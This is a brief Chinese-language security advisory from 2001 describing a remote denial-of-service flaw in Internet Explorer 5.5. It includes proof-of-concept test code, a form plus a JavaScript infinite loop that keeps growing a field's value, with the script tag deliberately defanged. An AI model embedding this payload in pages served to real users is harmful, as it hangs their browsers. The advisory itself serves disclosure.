IE存在另一个拒绝服务攻击(BOX值)发布时间:2001-12-17 更新时间:2001-12-17 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 Internet Explorer version 5.5详细描述 Internet Explorer 存在一个安全漏洞可以导致远程攻击者使程序挂起,通过 更新表FORM值为一个恒定值box就可以导致拒绝服务攻击。 测试代码 (这里"I"用!代替防止执行) <form name="form"><input type="text" name="box"><form> <scr!pt language="javascript"> while(true) { document.form.box.value=document.form.box.value + '§'; } </script> 解决方案 尚无 相关信息 wodahs at mail.com 参考:http://www.securiteam.com/windowsntfocus/6E00C0U3GU.html |
